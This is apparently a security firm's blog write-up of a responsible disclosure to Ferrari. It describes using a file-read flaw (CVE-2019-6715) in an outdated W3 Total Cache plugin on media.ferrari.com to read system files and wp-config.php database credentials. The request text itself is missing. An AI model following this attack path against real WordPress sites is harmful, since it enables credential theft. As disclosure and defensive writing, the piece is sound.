We don’t have a Ferrari, but we had their database credentials
Have you ever wondered what it feels like to own a Ferrari? We did. Not the car itself, but access to their database credentials.
Following Ferrari Responsible Disclosure Program1 Char49 discovered a vulnerability on the media.ferrari.com subdomain. The vulnerability affected a popular Wordpress plugin called W3 Total Cache2 and could have allowed an attacker to read arbitrary files3 on the web server.
W3 Total Cache is a popular plugin used by millions of Wordpress users worldwide to improve website performance. However, it's also a common target for attackers due to its widespread use.
During the reconnaissance phase, once we’ve identified an outdated vulnerable version of the W3 Total Cache plugin, our team set as goal to demonstrate the impact to Ferrari, to capture the database connection credentials. In this article we cover the journey towards our goal.
Reconnaissance
It didn't require much effort to understand that Ferrari was running WordPress, the popular free and open-source content management system (CMS), in their media.ferrari.com subdomain. Despite other more advanced fingerprinting techniques, inspecting the DOM (Document Object Model) using the Developer Tools provided by most modern browsers, revealed that several resources were being loaded from the well-known wp-content directory as highlighted in the figure below.
WPScan - WordPress security scanner4, is a well known and helpful tool typically used during the reconnaissance phase to enumerate, among other things, installed plugins. This pointed us towards a vulnerable version of W3 Total Cache: v0.9.3.
If you check W3 Total Cache change log5, you’ll immediately notice that the latest version (at the time of writing) is v2.3.1. This should give you a good idea how outdated the plugin was. The change log is one of the places to see what has changed since v0.9.3: the installed version. Searching the page for “security” occurrences is one way to look for possible vulnerability fixes, but there are several other techniques such a Google dorking6, or W3 Total Cache CVEs7 checking. A combination of the mentioned techniques led us to CVE-2019-67158: an unauthenticated arbitrary file read vulnerability present on W3 Total Cache versions before v0.9.4.
Exploitation
In order to achieve our goal, expose database credentials, we were looking for the wp-config.php WordPress file where the credentials are stored in plaintext (unencrypted). The location of this file in the file system depends on several factors: the operating system and the HTTP server responsible to serve the WordPress website are just two of them.
We already had a good idea of what operating system and HTTP server was running on the server, based on some fingerprinting returned by WPScan, but we decided to double check it. To identify the operating system, reading the /etc/issue file confirmed it was an old version of Ubuntu released in April, 2014 whose support was extended until April 20249.
Which returned:
Knowing what the operating system was and with a hint that the HTTP server should be Apache, we’ve looked for the main configuration file of the later (/etc/apache2/apache.conf) in order to understand whether and what Virtual Hosts10 were available/enabled:
Based on the returned response, we’ve figured out that virtual hosts-specific configuration was being loaded from the Apache sites-enabled folder. The name of the Virtual Host configuration file itself was kind of guesswork based on our experience on Apache HTTP server Virtual Hosts configuration. The following cURL request gave as the DocumentRoot11 (location) where the WordPress files where being served from:
Which returned:
Now with the path to the WordPress media.ferrari.com website we just needed to read the wp-config.php and get the database details and keys:
Below is a partial screenshot of the original wp-config.php file with sensitive data occluded:
Ferrari was fast to solve this issue and very responsive showing that they care about security. “Thank you for your report, you have contributed to improving Ferrari's cyber security posture.”
Also, they acknowledged our work by adding us to their Wall of Fame12.
It's worth noting that Ferrari patched their server updating the plugin13. This incident serves as a reminder to all website owners and administrators to remain vigilant when it comes to security.
Regular vulnerability assessments and penetration testing are essential for identifying and addressing security risks before they can be exploited by attackers. Additionally, keeping all software and plugins up to date with the latest security patches is critical for maintaining a secure website.